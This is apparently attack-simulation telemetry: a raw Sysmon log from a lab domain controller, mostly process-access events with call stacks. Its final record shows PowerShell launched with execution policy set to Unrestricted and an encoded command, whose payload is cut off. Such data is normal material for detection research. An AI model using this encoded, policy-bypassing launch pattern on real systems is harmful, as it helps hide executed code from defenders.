10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000666Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}608732C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.719{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3C63-5F80-0700-000000007E01}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.687{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_g1fzveeq.c12.ps12020-10-09 10:39:20.687 10341000x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.687{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3DD8-5F80-1403-000000007E01}36284572C:\Windows\system32\conhost.exe{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3DD8-5F80-1503-000000007E01}49163276C:\Windows\system32\cmd.exe{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.656{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:20.663{733EE690-3DD8-5F80-1603-000000007E01}4820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 